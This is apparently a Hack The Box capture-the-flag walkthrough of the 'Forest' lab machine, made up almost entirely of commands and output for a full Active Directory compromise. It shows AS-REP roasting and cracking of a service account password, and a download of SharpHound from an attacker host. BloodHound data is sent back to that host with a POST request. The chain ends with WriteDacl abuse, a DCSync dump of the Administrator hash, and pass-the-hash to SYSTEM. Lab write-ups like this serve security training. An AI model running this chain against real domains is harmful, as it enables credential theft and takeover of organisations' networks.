Forest
Fri, 27 September 2024
Platform: Hack The Box
sudo nmap 10.10.10.161 -sV -Pn -r -g53 -D 1.1.1.1 -p- --min-rate=3000 -sC
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-25 23:15 BST
Nmap scan report for 10.10.10.161
Host is up (0.074s latency).
Not shown: 65511 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-09-25 22:22:28Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49676/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49677/tcp open msrpc Microsoft Windows RPC
49684/tcp open msrpc Microsoft Windows RPC
49706/tcp open msrpc Microsoft Windows RPC
49977/tcp open msrpc Microsoft Windows RPC
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
|_clock-skew: mean: 2h26m50s, deviation: 4h02m30s, median: 6m50s
| smb2-time:
| date: 2024-09-25T22:23:20
|_ start_date: 2024-09-25T00:20:45
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: FOREST
| NetBIOS computer name: FOREST\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: FOREST.htb.local
|_ System time: 2024-09-25T15:23:18-07:00
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 87.05 seconds
sudo nano /etc/hosts
Domain name: htb.local
Forest name: htb.local
FQDN: FOREST.htb.local
enum4linux 10.10.10.161
Group: 'Domain Users' (RID: 513) has member: HTB\sebastien
Group: 'Domain Users' (RID: 513) has member: HTB\lucinda
Group: 'Domain Users' (RID: 513) has member: HTB\svc-alfresco
Group: 'Domain Users' (RID: 513) has member: HTB\andy
Group: 'Domain Users' (RID: 513) has member: HTB\mark
Group: 'Domain Users' (RID: 513) has member: HTB\santi
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]
Group: 'Enterprise Admins' (RID: 519) has member: HTB\Administrator
Group: 'Domain Users' (RID: 513) has member: HTB\Administrator
Group: 'Domain Users' (RID: 513) has member: HTB\DefaultAccount
Group: 'Domain Users' (RID: 513) has member: HTB\krbtgt
Group: 'Domain Users' (RID: 513) has member: HTB\$331000-VK4ADACQNUCA
Group: 'Domain Users' (RID: 513) has member: HTB\sebastien
Group: 'Domain Users' (RID: 513) has member: HTB\lucinda
Group: 'Domain Users' (RID: 513) has member: HTB\svc-alfresco
Group: 'Domain Users' (RID: 513) has member: HTB\andy
Group: 'Domain Users' (RID: 513) has member: HTB\mark
Group: 'Domain Users' (RID: 513) has member: HTB\santi
Group: 'Organization Management' (RID: 1104) has member: HTB\Administrator
Group: 'Group Policy Creator Owners' (RID: 520) has member: HTB\Administrator
Group: 'Exchange Servers' (RID: 1118) has member: HTB\$D31000-NSEL5BRJ63V7
Group: 'Schema Admins' (RID: 518) has member: HTB\Administrator
Group: 'Domain Admins' (RID: 512) has member: HTB\Administrator
Group: 'Domain Guests' (RID: 514) has member: HTB\Guest
Group: 'Privileged IT Accounts' (RID: 1149) has member: HTB\Service Accounts
Group: 'Service Accounts' (RID: 1148) has member: HTB\svc-alfresco
user:[svc-alfresco] rid:[0x47b]
Group: 'Service Accounts' (RID: 1148) has member: HTB\svc-alfresco
impacket-GetNPUsers htb.local/svc-alfresco -no-pass
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Getting TGT for svc-alfresco
$krb5asrep$23$svc-alfresco@HTB.LOCAL:d4a69f354ac6262fc100e3669429a950$c5732627693114d97f5993eb1a7b98c265c708aeefbd5abc11fd40ed335a735f59ca83af64e584cb9658aa9a2a2537eee8bd8f639f4cd20de81af6ec589932ea83d910134d61c2f8615e3823732e10336d1ba49a6afe3b4cf22976e6892fdb4c3c18e0d65999124693594de8969706ab381114dfa3f2fcf6aa0f09c6caf4eace098c90a6f30b1c3dc50ce0a35a8ffd5ea401e5fee46043bdc9653ad827ade94508b660de965449affe839b6d7acdf293150871c21de84f1efe7888c1f83d643fa7178e028f4cad6d25f9924c91aec227c673a0c5e0f38b7ff27eccb041cd588dabd538505bf2
echo '$krb5asrep$23$svc-alfresco@HTB.LOCAL:d4a69f354ac6262fc100e3669429a950$c5732627693114d97f5993eb1a7b98c265c708aeefbd5abc11fd40ed335a735f59ca83af64e584cb9658aa9a2a2537eee8bd8f639f4cd20de81af6ec589932ea83d910134d61c2f8615e3823732e10336d1ba49a6afe3b4cf22976e6892fdb4c3c18e0d65999124693594de8969706ab381114dfa3f2fcf6aa0f09c6caf4eace098c90a6f30b1c3dc50ce0a35a8ffd5ea401e5fee46043bdc9653ad827ade94508b660de965449affe839b6d7acdf293150871c21de84f1efe7888c1f83d643fa7178e028f4cad6d25f9924c91aec227c673a0c5e0f38b7ff27eccb041cd588dabd538505bf2' > hashes
john hashes -w=rockyou
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 512/512 AVX512BW 16x])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
s3rvice ($krb5asrep$23$svc-alfresco@HTB.LOCAL)
1g 0:00:00:01 DONE (2024-09-26 01:08) 0.5025g/s 2054Kp/s 2054Kc/s 2054KC/s s515253..s262793
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
svc-alfresco:s3rvice
evil-winrm -i htb.local -u svc-alfresco -p 's3rvice'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this ma
chine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> dir
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> cd ..
*Evil-WinRM* PS C:\Users\svc-alfresco> dir
Directory: C:\Users\svc-alfresco
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 9/23/2019 2:16 PM Desktop
d-r--- 9/22/2019 4:02 PM Documents
d-r--- 7/16/2016 6:18 AM Downloads
d-r--- 7/16/2016 6:18 AM Favorites
d-r--- 7/16/2016 6:18 AM Links
d-r--- 7/16/2016 6:18 AM Music
d-r--- 7/16/2016 6:18 AM Pictures
d----- 7/16/2016 6:18 AM Saved Games
d-r--- 7/16/2016 6:18 AM Videos
*Evil-WinRM* PS C:\Users> gci -Recurse | % FullName
C:\Users\Administrator
C:\Users\Public
C:\Users\sebastien
C:\Users\svc-alfresco
Access to the path 'C:\Users\Administrator' is denied.
C:\Users\svc-alfresco\Desktop
C:\Users\svc-alfresco\Documents
C:\Users\svc-alfresco\Downloads
C:\Users\svc-alfresco\Favorites
C:\Users\svc-alfresco\Links
C:\Users\svc-alfresco\Music
C:\Users\svc-alfresco\Pictures
C:\Users\svc-alfresco\Saved Games
C:\Users\svc-alfresco\Videos
C:\Users\svc-alfresco\Desktop\user.txt
*Evil-WinRM* PS C:\Users> type C:\Users\svc-alfresco\Desktop\user.txt
83982e5bded81bde734c6f693ed23ad8
*Evil-WinRM* PS C:\Users> cd c:\programdata
*Evil-WinRM* PS C:\programdata> dir
Directory: C:\programdata
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---s- 11/20/2016 6:36 PM Microsoft
d----- 9/22/2019 4:56 PM Package Cache
d----- 9/18/2019 10:08 AM regid.1991-06.com.microsoft
d----- 7/16/2016 6:18 AM SoftwareDistribution
d----- 11/20/2016 6:19 PM USOPrivate
d----- 11/20/2016 6:19 PM USOShared
d----- 9/22/2019 4:56 PM VMware
*Evil-WinRM* PS C:\programdata> curl 10.10.16.7:8088/Windows/sharphound.exe -o ./sharphound.exe
*Evil-WinRM* PS C:\programdata> dir
Directory: C:\programdata
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---s- 11/20/2016 6:36 PM Microsoft
d----- 9/22/2019 4:56 PM Package Cache
d----- 9/18/2019 10:08 AM regid.1991-06.com.microsoft
d----- 7/16/2016 6:18 AM SoftwareDistribution
d----- 11/20/2016 6:19 PM USOPrivate
d----- 11/20/2016 6:19 PM USOShared
d----- 9/22/2019 4:56 PM VMware
-a---- 9/26/2024 7:33 PM 1046528 sharphound.exe
*Evil-WinRM* PS C:\programdata> .\sharphound.exe
2024-09-26T19:33:48.5189074-07:00|INFORMATION|This version of SharpHound is compatible with the 4.3.1 Release of BloodHound
2024-09-26T19:33:48.6439624-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-09-26T19:33:48.6754799-07:00|INFORMATION|Initializing SharpHound at 7:33 PM on 9/26/2024
2024-09-26T19:33:48.8470306-07:00|INFORMATION|[CommonLib LDAPUtils]Found usable Domain Controller for htb.local : FOREST.htb.local
2024-09-26T19:33:48.9720402-07:00|INFORMATION|Flags: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-09-26T19:33:49.2845335-07:00|INFORMATION|Beginning LDAP search for htb.local
2024-09-26T19:33:49.3626631-07:00|INFORMATION|Producer has finished, closing LDAP channel
2024-09-26T19:33:49.3626631-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2024-09-26T19:34:20.2221028-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 38 MB RAM
2024-09-26T19:34:34.7533779-07:00|INFORMATION|Consumers finished, closing output channel
2024-09-26T19:34:34.7846264-07:00|INFORMATION|Output channel closed, waiting for output task to complete
Closing writers
2024-09-26T19:34:34.9096250-07:00|INFORMATION|Status: 161 objects finished (+161 3.577778)/s -- Using 46 MB RAM
2024-09-26T19:34:34.9096250-07:00|INFORMATION|Enumeration finished in 00:00:45.6367282
2024-09-26T19:34:34.9877542-07:00|INFORMATION|Saving cache with stats: 118 ID to type mappings.
117 name to SID mappings.
0 machine sid mappings.
2 sid to domain mappings.
0 global catalog mappings.
2024-09-26T19:34:35.0033810-07:00|INFORMATION|SharpHound Enumeration Completed at 7:34 PM on 9/26/2024! Happy Graphing!
nc -lvp 4435 > bloodhound.zip
Listening on 0.0.0.0 4435
*Evil-WinRM* PS C:\programdata> dir
Directory: C:\programdata
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---s- 11/20/2016 6:36 PM Microsoft
d----- 9/22/2019 4:56 PM Package Cache
d----- 9/18/2019 10:08 AM regid.1991-06.com.microsoft
d----- 7/16/2016 6:18 AM SoftwareDistribution
d----- 11/20/2016 6:19 PM USOPrivate
d----- 11/20/2016 6:19 PM USOShared
d----- 9/22/2019 4:56 PM VMware
-a---- 9/26/2024 7:34 PM 18970 20240926193434_BloodHound.zip
-a---- 9/26/2024 7:38 PM 19538 MzZhZTZmYjktOTM4NS00NDQ3LTk3OGItMmEyYTVjZjNiYTYw.bin
-a---- 9/26/2024 7:33 PM 1046528 sharphound.exe
*Evil-WinRM* PS C:\programdata> iwr http://10.10.16.7:4435 -Method POST -InFile ".\20240926193434_BloodHound.zip"
nc -lvp 4435 > bloodhound.zip
Listening on 0.0.0.0 4435
Connection received on htb.local 53355
ls bloodhound
20240926193434_computers.json
20240926193434_domains.json
20240926193434_groups.json
20240926193434_users.json
20240926193434_containers.json
20240926193434_gpos.json
20240926193434_ous.json
neo4j console
bloodhound
shortest path to 'htb.local'
exchange windows permissions 'WriteDacl'
The members of the group EXCHANGE WINDOWS PERMISSIONS@HTB.LOCAL have permissions to modify the DACL (Discretionary Access Control List) on the domain HTB.LOCAL
With write access to the target object's DACL, you can grant yourself any privilege you want on the object.
*Evil-WinRM* PS C:\programdata> net group "EXCHANGE WINDOWS PERMISSIONS" "svc-alfresco" /add
The command completed successfully.
impacket-ntlmrelayx -t ldap://htb.local --escalate-user svc-alfresco
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Protocol Client SMTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666
[*] Servers started, waiting for connections
[*] Open browser 127.0.0.1
[*] Login svc-alfresco:s3rvice
[*] HTTPD(80): Connection from 127.0.0.1 controlled, attacking target ldap://htb.local
[*] HTTPD(80): Client requested path: /
[*] HTTPD(80): Authenticating against ldap://htb.local as /SVC-ALFRESCO SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] User privileges found: Create user
[*] User privileges found: Modifying domain ACL
[*] Querying domain security descriptor
[*] Success! User svc-alfresco now has Replication-Get-Changes-All privileges on the domain
[*] Try using DCSync with secretsdump.py and this user :)
[*] Saved restore state to aclpwn-20240927-041002.restore
[*] Dumping domain info for first time
[*] Domain info dumped into lootdir!
impacket-secretsdump svc-alfresco@htb.local
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
Password:
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
evil-winrm -i htb.local -u Administrator -H '32693b11e6aa90eb43d32c72a07ceea6'
*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\Administrator\Desktop\root.txt
996b8903c7c59a1529ad64883c86be04
impacket-psexec Administrator@htb.local cmd.exe -hashes 'aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Requesting shares on htb.local.....
[*] Found writable share ADMIN$
[*] Uploading file jybxPuJr.exe
[*] Opening SVCManager on htb.local.....
[*] Creating service zcOb on htb.local.....
[*] Starting service zcOb.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> type C:\Users\Administrator\Desktop\root.txt
996b8903c7c59a1529ad64883c86be04